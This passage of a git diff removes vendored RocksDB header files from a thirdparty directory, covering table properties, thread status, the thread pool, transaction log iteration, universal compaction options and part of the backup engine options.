-    std::shared_ptr<TableFactory> cuckoo_table_factory = nullptr);
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/table_properties.h b/thirdparty/rocksdb/include/rocksdb/table_properties.h
deleted file mode 100644
index 2605fad..0000000
--- a/thirdparty/rocksdb/include/rocksdb/table_properties.h
+++ /dev/null
@@ -1,221 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <stdint.h>
-#include <map>
-#include <string>
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-// -- Table Properties
-// Other than basic table properties, each table may also have the user
-// collected properties.
-// The value of the user-collected properties are encoded as raw bytes --
-// users have to interprete these values by themselves.
-// Note: To do prefix seek/scan in `UserCollectedProperties`, you can do
-// something similar to:
-//
-// UserCollectedProperties props = ...;
-// for (auto pos = props.lower_bound(prefix);
-//      pos != props.end() && pos->first.compare(0, prefix.size(), prefix) == 0;
-//      ++pos) {
-//   ...
-// }
-typedef std::map<std::string, std::string> UserCollectedProperties;
-
-// table properties' human-readable names in the property block.
-struct TablePropertiesNames {
-  static const std::string kDataSize;
-  static const std::string kIndexSize;
-  static const std::string kIndexPartitions;
-  static const std::string kTopLevelIndexSize;
-  static const std::string kFilterSize;
-  static const std::string kRawKeySize;
-  static const std::string kRawValueSize;
-  static const std::string kNumDataBlocks;
-  static const std::string kNumEntries;
-  static const std::string kFormatVersion;
-  static const std::string kFixedKeyLen;
-  static const std::string kFilterPolicy;
-  static const std::string kColumnFamilyName;
-  static const std::string kColumnFamilyId;
-  static const std::string kComparator;
-  static const std::string kMergeOperator;
-  static const std::string kPrefixExtractorName;
-  static const std::string kPropertyCollectors;
-  static const std::string kCompression;
-  static const std::string kCreationTime;
-  static const std::string kOldestKeyTime;
-};
-
-extern const std::string kPropertiesBlock;
-extern const std::string kCompressionDictBlock;
-extern const std::string kRangeDelBlock;
-
-enum EntryType {
-  kEntryPut,
-  kEntryDelete,
-  kEntrySingleDelete,
-  kEntryMerge,
-  kEntryOther,
-};
-
-// `TablePropertiesCollector` provides the mechanism for users to collect
-// their own properties that they are interested in. This class is essentially
-// a collection of callback functions that will be invoked during table
-// building. It is construced with TablePropertiesCollectorFactory. The methods
-// don't need to be thread-safe, as we will create exactly one
-// TablePropertiesCollector object per table and then call it sequentially
-class TablePropertiesCollector {
- public:
-  virtual ~TablePropertiesCollector() {}
-
-  // DEPRECATE User defined collector should implement AddUserKey(), though
-  //           this old function still works for backward compatible reason.
-  // Add() will be called when a new key/value pair is inserted into the table.
-  // @params key    the user key that is inserted into the table.
-  // @params value  the value that is inserted into the table.
-  virtual Status Add(const Slice& /*key*/, const Slice& /*value*/) {
-    return Status::InvalidArgument(
-        "TablePropertiesCollector::Add() deprecated.");
-  }
-
-  // AddUserKey() will be called when a new key/value pair is inserted into the
-  // table.
-  // @params key    the user key that is inserted into the table.
-  // @params value  the value that is inserted into the table.
-  virtual Status AddUserKey(const Slice& key, const Slice& value,
-                            EntryType /*type*/, SequenceNumber /*seq*/,
-                            uint64_t /*file_size*/) {
-    // For backwards-compatibility.
-    return Add(key, value);
-  }
-
-  // Finish() will be called when a table has already been built and is ready
-  // for writing the properties block.
-  // @params properties  User will add their collected statistics to
-  // `properties`.
-  virtual Status Finish(UserCollectedProperties* properties) = 0;
-
-  // Return the human-readable properties, where the key is property name and
-  // the value is the human-readable form of value.
-  virtual UserCollectedProperties GetReadableProperties() const = 0;
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const = 0;
-
-  // EXPERIMENTAL Return whether the output file should be further compacted
-  virtual bool NeedCompact() const { return false; }
-};
-
-// Constructs TablePropertiesCollector. Internals create a new
-// TablePropertiesCollector for each new table
-class TablePropertiesCollectorFactory {
- public:
-  struct Context {
-    uint32_t column_family_id;
-    static const uint32_t kUnknownColumnFamily;
-  };
-
-  virtual ~TablePropertiesCollectorFactory() {}
-  // has to be thread-safe
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) = 0;
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const = 0;
-};
-
-// TableProperties contains a bunch of read-only properties of its associated
-// table.
-struct TableProperties {
- public:
-  // the total size of all data blocks.
-  uint64_t data_size = 0;
-  // the size of index block.
-  uint64_t index_size = 0;
-  // Total number of index partitions if kTwoLevelIndexSearch is used
-  uint64_t index_partitions = 0;
-  // Size of the top-level index if kTwoLevelIndexSearch is used
-  uint64_t top_level_index_size = 0;
-  // the size of filter block.
-  uint64_t filter_size = 0;
-  // total raw key size
-  uint64_t raw_key_size = 0;
-  // total raw value size
-  uint64_t raw_value_size = 0;
-  // the number of blocks in this table
-  uint64_t num_data_blocks = 0;
-  // the number of entries in this table
-  uint64_t num_entries = 0;
-  // format version, reserved for backward compatibility
-  uint64_t format_version = 0;
-  // If 0, key is variable length. Otherwise number of bytes for each key.
-  uint64_t fixed_key_len = 0;
-  // ID of column family for this SST file, corresponding to the CF identified
-  // by column_family_name.
-  uint64_t column_family_id =
-      rocksdb::TablePropertiesCollectorFactory::Context::kUnknownColumnFamily;
-  // The time when the SST file was created.
-  // Since SST files are immutable, this is equivalent to last modified time.
-  uint64_t creation_time = 0;
-  // Timestamp of the earliest key. 0 means unknown.
-  uint64_t oldest_key_time = 0;
-
-  // Name of the column family with which this SST file is associated.
-  // If column family is unknown, `column_family_name` will be an empty string.
-  std::string column_family_name;
-
-  // The name of the filter policy used in this table.
-  // If no filter policy is used, `filter_policy_name` will be an empty string.
-  std::string filter_policy_name;
-
-  // The name of the comparator used in this table.
-  std::string comparator_name;
-
-  // The name of the merge operator used in this table.
-  // If no merge operator is used, `merge_operator_name` will be "nullptr".
-  std::string merge_operator_name;
-
-  // The name of the prefix extractor used in this table
-  // If no prefix extractor is used, `prefix_extractor_name` will be "nullptr".
-  std::string prefix_extractor_name;
-
-  // The names of the property collectors factories used in this table
-  // separated by commas
-  // {collector_name[1]},{collector_name[2]},{collector_name[3]} ..
-  std::string property_collectors_names;
-
-  // The compression algo used to compress the SST files.
-  std::string compression_name;
-
-  // user collected properties
-  UserCollectedProperties user_collected_properties;
-  UserCollectedProperties readable_properties;
-
-  // The offset of the value of each property in the file.
-  std::map<std::string, uint64_t> properties_offsets;
-
-  // convert this object to a human readable form
-  //   @prop_delim: delimiter for each property.
-  std::string ToString(const std::string& prop_delim = "; ",
-                       const std::string& kv_delim = "=") const;
-
-  // Aggregate the numerical member variables of the specified
-  // TableProperties.
-  void Add(const TableProperties& tp);
-};
-
-// Extra properties
-// Below is a list of non-basic properties that are collected by database
-// itself. Especially some properties regarding to the internal keys (which
-// is unknown to `table`).
-extern uint64_t GetDeletedKeys(const UserCollectedProperties& props);
-extern uint64_t GetMergeOperands(const UserCollectedProperties& props,
-                                 bool* property_present);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/thread_status.h b/thirdparty/rocksdb/include/rocksdb/thread_status.h
deleted file mode 100644
index 55c32ed..0000000
--- a/thirdparty/rocksdb/include/rocksdb/thread_status.h
+++ /dev/null
@@ -1,193 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file defines the structures for exposing run-time status of any
-// rocksdb-related thread.  Such run-time status can be obtained via
-// GetThreadList() API.
-//
-// Note that all thread-status features are still under-development, and
-// thus APIs and class definitions might subject to change at this point.
-// Will remove this comment once the APIs have been finalized.
-
-#pragma once
-
-#include <stdint.h>
-#include <cstddef>
-#include <map>
-#include <string>
-#include <utility>
-#include <vector>
-
-#if !defined(ROCKSDB_LITE) && \
-    !defined(NROCKSDB_THREAD_STATUS) && \
-    defined(ROCKSDB_SUPPORT_THREAD_LOCAL)
-#define ROCKSDB_USING_THREAD_STATUS
-#endif
-
-namespace rocksdb {
-
-// TODO(yhchiang): remove this function once c++14 is available
-//                 as std::max will be able to cover this.
-// Current MS compiler does not support constexpr
-template <int A, int B>
-struct constexpr_max {
-  static const int result = (A > B) ? A : B;
-};
-
-// A structure that describes the current status of a thread.
-// The status of active threads can be fetched using
-// rocksdb::GetThreadList().
-struct ThreadStatus {
-  // The type of a thread.
-  enum ThreadType : int {
-    HIGH_PRIORITY = 0,  // RocksDB BG thread in high-pri thread pool
-    LOW_PRIORITY,  // RocksDB BG thread in low-pri thread pool
-    USER,  // User thread (Non-RocksDB BG thread)
-    NUM_THREAD_TYPES
-  };
-
-  // The type used to refer to a thread operation.
-  // A thread operation describes high-level action of a thread.
-  // Examples include compaction and flush.
-  enum OperationType : int {
-    OP_UNKNOWN = 0,
-    OP_COMPACTION,
-    OP_FLUSH,
-    NUM_OP_TYPES
-  };
-
-  enum OperationStage : int {
-    STAGE_UNKNOWN = 0,
-    STAGE_FLUSH_RUN,
-    STAGE_FLUSH_WRITE_L0,
-    STAGE_COMPACTION_PREPARE,
-    STAGE_COMPACTION_RUN,
-    STAGE_COMPACTION_PROCESS_KV,
-    STAGE_COMPACTION_INSTALL,
-    STAGE_COMPACTION_SYNC_FILE,
-    STAGE_PICK_MEMTABLES_TO_FLUSH,
-    STAGE_MEMTABLE_ROLLBACK,
-    STAGE_MEMTABLE_INSTALL_FLUSH_RESULTS,
-    NUM_OP_STAGES
-  };
-
-  enum CompactionPropertyType : int {
-    COMPACTION_JOB_ID = 0,
-    COMPACTION_INPUT_OUTPUT_LEVEL,
-    COMPACTION_PROP_FLAGS,
-    COMPACTION_TOTAL_INPUT_BYTES,
-    COMPACTION_BYTES_READ,
-    COMPACTION_BYTES_WRITTEN,
-    NUM_COMPACTION_PROPERTIES
-  };
-
-  enum FlushPropertyType : int {
-    FLUSH_JOB_ID = 0,
-    FLUSH_BYTES_MEMTABLES,
-    FLUSH_BYTES_WRITTEN,
-    NUM_FLUSH_PROPERTIES
-  };
-
-  // The maximum number of properties of an operation.
-  // This number should be set to the biggest NUM_XXX_PROPERTIES.
-  static const int kNumOperationProperties =
-      constexpr_max<NUM_COMPACTION_PROPERTIES, NUM_FLUSH_PROPERTIES>::result;
-
-  // The type used to refer to a thread state.
-  // A state describes lower-level action of a thread
-  // such as reading / writing a file or waiting for a mutex.
-  enum StateType : int {
-    STATE_UNKNOWN = 0,
-    STATE_MUTEX_WAIT = 1,
-    NUM_STATE_TYPES
-  };
-
-  ThreadStatus(const uint64_t _id,
-               const ThreadType _thread_type,
-               const std::string& _db_name,
-               const std::string& _cf_name,
-               const OperationType _operation_type,
-               const uint64_t _op_elapsed_micros,
-               const OperationStage _operation_stage,
-               const uint64_t _op_props[],
-               const StateType _state_type) :
-      thread_id(_id), thread_type(_thread_type),
-      db_name(_db_name),
-      cf_name(_cf_name),
-      operation_type(_operation_type),
-      op_elapsed_micros(_op_elapsed_micros),
-      operation_stage(_operation_stage),
-      state_type(_state_type) {
-    for (int i = 0; i < kNumOperationProperties; ++i) {
-      op_properties[i] = _op_props[i];
-    }
-  }
-
-  // An unique ID for the thread.
-  const uint64_t thread_id;
-
-  // The type of the thread, it could be HIGH_PRIORITY,
-  // LOW_PRIORITY, and USER
-  const ThreadType thread_type;
-
-  // The name of the DB instance where the thread is currently
-  // involved with.  It would be set to empty string if the thread
-  // does not involve in any DB operation.
-  const std::string db_name;
-
-  // The name of the column family where the thread is currently
-  // It would be set to empty string if the thread does not involve
-  // in any column family.
-  const std::string cf_name;
-
-  // The operation (high-level action) that the current thread is involved.
-  const OperationType operation_type;
-
-  // The elapsed time of the current thread operation in microseconds.
-  const uint64_t op_elapsed_micros;
-
-  // An integer showing the current stage where the thread is involved
-  // in the current operation.
-  const OperationStage operation_stage;
-
-  // A list of properties that describe some details about the current
-  // operation.  Same field in op_properties[] might have different
-  // meanings for different operations.
-  uint64_t op_properties[kNumOperationProperties];
-
-  // The state (lower-level action) that the current thread is involved.
-  const StateType state_type;
-
-  // The followings are a set of utility functions for interpreting
-  // the information of ThreadStatus
-
-  static const std::string& GetThreadTypeName(ThreadType thread_type);
-
-  // Obtain the name of an operation given its type.
-  static const std::string& GetOperationName(OperationType op_type);
-
-  static const std::string MicrosToString(uint64_t op_elapsed_time);
-
-  // Obtain a human-readable string describing the specified operation stage.
-  static const std::string& GetOperationStageName(
-      OperationStage stage);
-
-  // Obtain the name of the "i"th operation property of the
-  // specified operation.
-  static const std::string& GetOperationPropertyName(
-      OperationType op_type, int i);
-
-  // Translate the "i"th property of the specified operation given
-  // a property value.
-  static std::map<std::string, uint64_t>
-      InterpretOperationProperties(
-          OperationType op_type, const uint64_t* op_properties);
-
-  // Obtain the name of a state given its type.
-  static const std::string& GetStateName(StateType state_type);
-};
-
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/threadpool.h b/thirdparty/rocksdb/include/rocksdb/threadpool.h
deleted file mode 100644
index e871ee1..0000000
--- a/thirdparty/rocksdb/include/rocksdb/threadpool.h
+++ /dev/null
@@ -1,57 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <functional>
-
-namespace rocksdb {
-
-/*
- * ThreadPool is a component that will spawn N background threads that will
- * be used to execute scheduled work, The number of background threads could
- * be modified by calling SetBackgroundThreads().
- * */
-class ThreadPool {
- public:
-  virtual ~ThreadPool() {}
-
-  // Wait for all threads to finish.
-  // Discard those threads that did not start
-  // executing
-  virtual void JoinAllThreads() = 0;
-
-  // Set the number of background threads that will be executing the
-  // scheduled jobs.
-  virtual void SetBackgroundThreads(int num) = 0;
-  virtual int GetBackgroundThreads() = 0;
-
-  // Get the number of jobs scheduled in the ThreadPool queue.
-  virtual unsigned int GetQueueLen() const = 0;
-
-  // Waits for all jobs to complete those
-  // that already started running and those that did not
-  // start yet. This ensures that everything that was thrown
-  // on the TP runs even though
-  // we may not have specified enough threads for the amount
-  // of jobs
-  virtual void WaitForJobsAndJoinAllThreads() = 0;
-
-  // Submit a fire and forget jobs
-  // This allows to submit the same job multiple times
-  virtual void SubmitJob(const std::function<void()>&) = 0;
-  // This moves the function in for efficiency
-  virtual void SubmitJob(std::function<void()>&&) = 0;
-
-};
-
-// NewThreadPool() is a function that could be used to create a ThreadPool
-// with `num_threads` background threads.
-extern ThreadPool* NewThreadPool(int num_threads);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/transaction_log.h b/thirdparty/rocksdb/include/rocksdb/transaction_log.h
deleted file mode 100644
index 7fc46ae..0000000
--- a/thirdparty/rocksdb/include/rocksdb/transaction_log.h
+++ /dev/null
@@ -1,125 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_
-#define STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_
-
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/write_batch.h"
-#include <memory>
-#include <vector>
-
-namespace rocksdb {
-
-class LogFile;
-typedef std::vector<std::unique_ptr<LogFile>> VectorLogPtr;
-
-enum  WalFileType {
-  /* Indicates that WAL file is in archive directory. WAL files are moved from
-   * the main db directory to archive directory once they are not live and stay
-   * there until cleaned up. Files are cleaned depending on archive size
-   * (Options::WAL_size_limit_MB) and time since last cleaning
-   * (Options::WAL_ttl_seconds).
-   */
-  kArchivedLogFile = 0,
-
-  /* Indicates that WAL file is live and resides in the main db directory */
-  kAliveLogFile = 1
-} ;
-
-class LogFile {
- public:
-  LogFile() {}
-  virtual ~LogFile() {}
-
-  // Returns log file's pathname relative to the main db dir
-  // Eg. For a live-log-file = /000003.log
-  //     For an archived-log-file = /archive/000003.log
-  virtual std::string PathName() const = 0;
-
-
-  // Primary identifier for log file.
-  // This is directly proportional to creation time of the log file
-  virtual uint64_t LogNumber() const = 0;
-
-  // Log file can be either alive or archived
-  virtual WalFileType Type() const = 0;
-
-  // Starting sequence number of writebatch written in this log file
-  virtual SequenceNumber StartSequence() const = 0;
-
-  // Size of log file on disk in Bytes
-  virtual uint64_t SizeFileBytes() const = 0;
-};
-
-struct BatchResult {
-  SequenceNumber sequence = 0;
-  std::unique_ptr<WriteBatch> writeBatchPtr;
-
-  // Add empty __ctor and __dtor for the rule of five
-  // However, preserve the original semantics and prohibit copying
-  // as the unique_ptr member does not copy.
-  BatchResult() {}
-
-  ~BatchResult() {}
-
-  BatchResult(const BatchResult&) = delete;
-
-  BatchResult& operator=(const BatchResult&) = delete;
-
-  BatchResult(BatchResult&& bResult)
-      : sequence(std::move(bResult.sequence)),
-        writeBatchPtr(std::move(bResult.writeBatchPtr)) {}
-
-  BatchResult& operator=(BatchResult&& bResult) {
-    sequence = std::move(bResult.sequence);
-    writeBatchPtr = std::move(bResult.writeBatchPtr);
-    return *this;
-  }
-};
-
-// A TransactionLogIterator is used to iterate over the transactions in a db.
-// One run of the iterator is continuous, i.e. the iterator will stop at the
-// beginning of any gap in sequences
-class TransactionLogIterator {
- public:
-  TransactionLogIterator() {}
-  virtual ~TransactionLogIterator() {}
-
-  // An iterator is either positioned at a WriteBatch or not valid.
-  // This method returns true if the iterator is valid.
-  // Can read data from a valid iterator.
-  virtual bool Valid() = 0;
-
-  // Moves the iterator to the next WriteBatch.
-  // REQUIRES: Valid() to be true.
-  virtual void Next() = 0;
-
-  // Returns ok if the iterator is valid.
-  // Returns the Error when something has gone wrong.
-  virtual Status status() = 0;
-
-  // If valid return's the current write_batch and the sequence number of the
-  // earliest transaction contained in the batch.
-  // ONLY use if Valid() is true and status() is OK.
-  virtual BatchResult GetBatch() = 0;
-
-  // The read options for TransactionLogIterator.
-  struct ReadOptions {
-    // If true, all data read from underlying storage will be
-    // verified against corresponding checksums.
-    // Default: true
-    bool verify_checksums_;
-
-    ReadOptions() : verify_checksums_(true) {}
-
-    explicit ReadOptions(bool verify_checksums)
-        : verify_checksums_(verify_checksums) {}
-  };
-};
-} //  namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/types.h b/thirdparty/rocksdb/include/rocksdb/types.h
deleted file mode 100644
index 106ac2f..0000000
--- a/thirdparty/rocksdb/include/rocksdb/types.h
+++ /dev/null
@@ -1,20 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_TYPES_H_
-#define STORAGE_ROCKSDB_INCLUDE_TYPES_H_
-
-#include <stdint.h>
-
-namespace rocksdb {
-
-// Define all public custom types here.
-
-// Represents a sequence number in a WAL file.
-typedef uint64_t SequenceNumber;
-
-}  //  namespace rocksdb
-
-#endif //  STORAGE_ROCKSDB_INCLUDE_TYPES_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/universal_compaction.h b/thirdparty/rocksdb/include/rocksdb/universal_compaction.h
deleted file mode 100644
index ed22208..0000000
--- a/thirdparty/rocksdb/include/rocksdb/universal_compaction.h
+++ /dev/null
@@ -1,90 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H
-#define STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H
-
-#include <stdint.h>
-#include <climits>
-#include <vector>
-
-namespace rocksdb {
-
-//
-// Algorithm used to make a compaction request stop picking new files
-// into a single compaction run
-//
-enum CompactionStopStyle {
-  kCompactionStopStyleSimilarSize, // pick files of similar size
-  kCompactionStopStyleTotalSize    // total size of picked files > next file
-};
-
-class CompactionOptionsUniversal {
- public:
-
-  // Percentage flexibility while comparing file size. If the candidate file(s)
-  // size is 1% smaller than the next file's size, then include next file into
-  // this candidate set. // Default: 1
-  unsigned int size_ratio;
-
-  // The minimum number of files in a single compaction run. Default: 2
-  unsigned int min_merge_width;
-
-  // The maximum number of files in a single compaction run. Default: UINT_MAX
-  unsigned int max_merge_width;
-
-  // The size amplification is defined as the amount (in percentage) of
-  // additional storage needed to store a single byte of data in the database.
-  // For example, a size amplification of 2% means that a database that
-  // contains 100 bytes of user-data may occupy upto 102 bytes of
-  // physical storage. By this definition, a fully compacted database has
-  // a size amplification of 0%. Rocksdb uses the following heuristic
-  // to calculate size amplification: it assumes that all files excluding
-  // the earliest file contribute to the size amplification.
-  // Default: 200, which means that a 100 byte database could require upto
-  // 300 bytes of storage.
-  unsigned int max_size_amplification_percent;
-
-  // If this option is set to be -1 (the default value), all the output files
-  // will follow compression type specified.
-  //
-  // If this option is not negative, we will try to make sure compressed
-  // size is just above this value. In normal cases, at least this percentage
-  // of data will be compressed.
-  // When we are compacting to a new file, here is the criteria whether
-  // it needs to be compressed: assuming here are the list of files sorted
-  // by generation time:
-  //    A1...An B1...Bm C1...Ct
-  // where A1 is the newest and Ct is the oldest, and we are going to compact
-  // B1...Bm, we calculate the total size of all the files as total_size, as
-  // well as  the total size of C1...Ct as total_C, the compaction output file
-  // will be compressed iff
-  //   total_C / total_size < this percentage
-  // Default: -1
-  int compression_size_percent;
-
-  // The algorithm used to stop picking files into a single compaction run
-  // Default: kCompactionStopStyleTotalSize
-  CompactionStopStyle stop_style;
-
-  // Option to optimize the universal multi level compaction by enabling
-  // trivial move for non overlapping files.
-  // Default: false
-  bool allow_trivial_move;
-
-  // Default set of parameters
-  CompactionOptionsUniversal()
-      : size_ratio(1),
-        min_merge_width(2),
-        max_merge_width(UINT_MAX),
-        max_size_amplification_percent(200),
-        compression_size_percent(-1),
-        stop_style(kCompactionStopStyleTotalSize),
-        allow_trivial_move(false) {}
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/backupable_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/backupable_db.h
deleted file mode 100644
index fc2b6ba..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/backupable_db.h
+++ /dev/null
@@ -1,328 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <string>
-#include <map>
-#include <vector>
-#include <functional>
-
-#include "rocksdb/utilities/stackable_db.h"
-
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-struct BackupableDBOptions {
-  // Where to keep the backup files. Has to be different than dbname_
-  // Best to set this to dbname_ + "/backups"
-  // Required
-  std::string backup_dir;
-
-  // Backup Env object. It will be used for backup file I/O. If it's
-  // nullptr, backups will be written out using DBs Env. If it's
-  // non-nullptr, backup's I/O will be performed using this object.
-  // If you want to have backups on HDFS, use HDFS Env here!
-  // Default: nullptr
-  Env* backup_env;
-
-  // If share_table_files == true, backup will assume that table files with
-  // same name have the same contents. This enables incremental backups and
-  // avoids unnecessary data copies.
-  // If share_table_files == false, each backup will be on its own and will
-  // not share any data with other backups.
-  // default: true
-  bool share_table_files;
-
-  // Backup info and error messages will be written to info_log
-  // if non-nullptr.
-  // Default: nullptr
-  Logger* info_log;
-
-  // If sync == true, we can guarantee you'll get consistent backup even
-  // on a machine crash/reboot. Backup process is slower with sync enabled.
-  // If sync == false, we don't guarantee anything on machine reboot. However,
-  // chances are some of the backups are consistent.
-  // Default: true
-  bool sync;
-
-  // If true, it will delete whatever backups there are already
-  // Default: false
-  bool destroy_old_data;
-
-  // If false, we won't backup log files. This option can be useful for backing
-  // up in-memory databases where log file are persisted, but table files are in
-  // memory.
-  // Default: true
-  bool backup_log_files;
-
-  // Max bytes that can be transferred in a second during backup.
-  // If 0, go as fast as you can
-  // Default: 0
-  uint64_t backup_rate_limit;
-
-  // Backup rate limiter. Used to control transfer speed for backup. If this is
-  // not null, backup_rate_limit is ignored.
-  // Default: nullptr
-  std::shared_ptr<RateLimiter> backup_rate_limiter{nullptr};
-
-  // Max bytes that can be transferred in a second during restore.
-  // If 0, go as fast as you can
-  // Default: 0
-  uint64_t restore_rate_limit;
-
-  // Restore rate limiter. Used to control transfer speed during restore. If
-  // this is not null, restore_rate_limit is ignored.
-  // Default: nullptr
-  std::shared_ptr<RateLimiter> restore_rate_limiter{nullptr};
-
-  // Only used if share_table_files is set to true. If true, will consider that
-  // backups can come from different databases, hence a sst is not uniquely
-  // identifed by its name, but by the triple (file name, crc32, file length)
-  // Default: false
-  // Note: this is an experimental option, and you'll need to set it manually
-  // *turn it on only if you know what you're doing*
-  bool share_files_with_checksum;
-
-  // Up to this many background threads will copy files for CreateNewBackup()
-  // and RestoreDBFromBackup()
-  // Default: 1
-  int max_background_operations;
-
-  // During backup user can get callback every time next
-  // callback_trigger_interval_size bytes being copied.
-  // Default: 4194304
-  uint64_t callback_trigger_interval_size;
-
-  // When Open() is called, it will open at most this many of the latest
-  // non-corrupted backups. If 0, it will open all available backups.
-  // Default: 0
-  int max_valid_backups_to_open;
-
-  void Dump(Logger* logger) const;
-
-  explicit BackupableDBOptions(
-      const std::string& _backup_dir, Env* _backup_env = nullptr,
-      bool _share_table_files = true, Logger* _info_log = nullptr,
-      bool _sync = true, bool _destroy_old_data = false,
-      bool _backup_log_files = true, uint64_t _backup_rate_limit = 0,
-      uint64_t _restore_rate_limit = 0, int _max_background_operations = 1,
-      uint64_t _callback_trigger_interval_size = 4 * 1024 * 1024,
-      int _max_valid_backups_to_open = 0)
-      : backup_dir(_backup_dir),
-        backup_env(_backup_env),
-        share_table_files(_share_table_files),
-        info_log(_info_log),
-        sync(_sync),
-        destroy_old_data(_destroy_old_data),
-        backup_log_files(_backup_log_files),
-        backup_rate_limit(_backup_rate_limit),
-        restore_rate_limit(_restore_rate_limit),
-        share_files_with_checksum(false),
-        max_background_operations(_max_background_operations),
-        callback_trigger_interval_size(_callback_trigger_interval_size),
-        max_valid_backups_to_open(_max_valid_backups_to_open) {
-    assert(share_table_files || !share_files_with_checksum);
-  }
-};
-
-struct RestoreOptions {
-  // If true, restore won't overwrite the existing log files in wal_dir. It will
-  // also move all log files from archive directory to wal_dir. Use this option
-  // in combination with BackupableDBOptions::backup_log_files = false for
-  // persisting in-memory databases.
-  // Default: false
-  bool keep_log_files;
-
-  explicit RestoreOptions(bool _keep_log_files = false)
-      : keep_log_files(_keep_log_files) {}
-};
-
-typedef uint32_t BackupID;
-
-struct BackupInfo {
-  BackupID backup_id;
-  int64_t timestamp;
-  uint64_t size;
-
-  uint32_t number_files;
-  std::string app_metadata;
-
-  BackupInfo() {}
-
-  BackupInfo(BackupID _backup_id, int64_t _timestamp, uint64_t _size,
-             uint32_t _number_files, const std::string& _app_metadata)
-      : backup_id(_backup_id),
-        timestamp(_timestamp),
-        size(_size),
-        number_files(_number_files),
-        app_metadata(_app_metadata) {}
-};
-
-class BackupStatistics {
- public:
-  BackupStatistics() {
-    number_success_backup = 0;
-    number_fail_backup = 0;
-  }
-
-  BackupStatistics(uint32_t _number_success_backup,
-                   uint32_t _number_fail_backup)
-      : number_success_backup(_number_success_backup),
-        number_fail_backup(_number_fail_backup) {}
-
-  ~BackupStatistics() {}
-
-  void IncrementNumberSuccessBackup();
-  void IncrementNumberFailBackup();
-
-  uint32_t GetNumberSuccessBackup() const;
-  uint32_t GetNumberFailBackup() const;
-
-  std::string ToString() const;
-
- private:
-  uint32_t number_success_backup;
-  uint32_t number_fail_backup;
-};
-
-// A backup engine for accessing information about backups and restoring from
-// them.
-class BackupEngineReadOnly {
- public:
-  virtual ~BackupEngineReadOnly() {}
-
-  static Status Open(Env* db_env, const BackupableDBOptions& options,
-                     BackupEngineReadOnly** backup_engine_ptr);
-
-  // Returns info about backups in backup_info
-  // You can GetBackupInfo safely, even with other BackupEngine performing
-  // backups on the same directory
-  virtual void GetBackupInfo(std::vector<BackupInfo>* backup_info) = 0;
-
-  // Returns info about corrupt backups in corrupt_backups
-  virtual void GetCorruptedBackups(
-      std::vector<BackupID>* corrupt_backup_ids) = 0;
-
-  // Restoring DB from backup is NOT safe when there is another BackupEngine
-  // running that might call DeleteBackup() or PurgeOldBackups(). It is caller's
-  // responsibility to synchronize the operation, i.e. don't delete the backup
-  // when you're restoring from it
-  // See also the corresponding doc in BackupEngine
-  virtual Status RestoreDBFromBackup(
